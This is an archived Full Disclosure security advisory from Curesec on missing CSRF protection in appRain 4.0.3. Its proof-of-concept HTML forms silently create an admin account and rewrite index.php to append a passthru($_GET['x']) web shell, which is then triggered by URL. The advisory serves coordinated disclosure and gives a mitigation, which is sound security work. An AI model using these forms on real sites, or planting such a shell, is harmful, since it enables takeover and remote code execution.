| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <0MM2cS-1aBSVL3x1A-007lmk@mrelayeu.kundenserver.de>
Date: Mon, 07 Dec 2015 18:16:03 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] appRain 4.0.3: CSRF
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: appRain 4.0.3
Fixed in: Fixed via Optional Module
CSRF Protection Module http://www.apprain.com/extension/20/accounting-system?s
Link: =Description
Vendor Website: info@...rain.com
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
CVSS
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
None of the requests have CSRF protection. This means that an attacker can
execute actions for an admin if the admin visits an attacker controlled website
while logged in.
3. Proof of Concept
Add new Admin:
<html>
<body>
<form action="http://localhost/apprain-source-4.0.3/admin/manage/add/" method="POST">
<input type="hidden" name="data[Admin][f_name]" value="foo" />
<input type="hidden" name="data[Admin][l_name]" value="foo" />
<input type="hidden" name="data[Admin][email]" value="foo@...mple.com" />
<input type="hidden" name="data[Admin][username]" value="foo" />
<input type="hidden" name="data[Admin][password]" value="fdnki2@#E@...od" />
<input type="hidden" name="data[Admin][status]" value="Active" />
<input type="hidden" name="data[Admin][description]" value="foo" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Code Execution (using the PHP file editor):
<html>
<body>
<form action="http://localhost/apprain-source-4.0.3/appeditor/index?loc=webroot/index.php" method="POST">
<input type="hidden" name="content" value="<?php
/**
* ---
* appRain CMF
*
* LICENSE
*
* This source file is subject to the MIT license that is bundled
* with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://www.opensource.org/licenses/mit-license.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@...rain.com so we can send you a copy immediately.
*
* @copyright Copyright (c) 2010 appRain, Team. (http://www.apprain.com)
* @license http://www.opensource.org/licenses/mit-license.php MIT license
*
* HELP
*
* Official Website
* http://www.apprain.com/
*
* Download Link
* http://www.apprain.com/download
*
* Documents Link
* http ://www.apprain.com/docs
*/
if (version_compare(phpversion(), '5.1.0', '<') === true) {
die("<strong>Whoops, it looks like you have an invalid PHP version.</strong><br /><span>appRain supports PHP 5.1.0 or newer.</span>");
}
$appLoc = "../app.php";
if (!file_exists($appLoc)) {
die("appRain core file(s) missing... Get a new copy ");
}
error_reporting(E_ALL);
require_once $appLoc;
umask(0);
App::Run();
passthru($_GET['x']);" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The injected code can now be executed here:
http://localhost/apprain-source-4.0.3/webroot/index.php?x=ls
4. Solution
To mitigate this issue please install the "Data Exchange Security" module:
http://www.apprain.com/extension/20/accounting-system?s=Description
5. Report Timeline
10/02/ Informed Vendor. Mailbox info@...rain.com is full, used
2015 security@...rain.com instead (no reply)
10/21/ Reminded Vendor of Disclosure Date
2015
10/21/ Vendor announces fix
2015
~11/02/ Vendor releases optional module for CSRF protection
2015
11/04/ Suggested to vendor that CSRF protection should not be optional (no
2015 reply)
11/17/ CVE Requested (no reply)
2015
12/02/ Disclosed to public
2015
Blog Reference:
https://blog.curesec.com/article/blog/appRain-403-CSRF-112.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists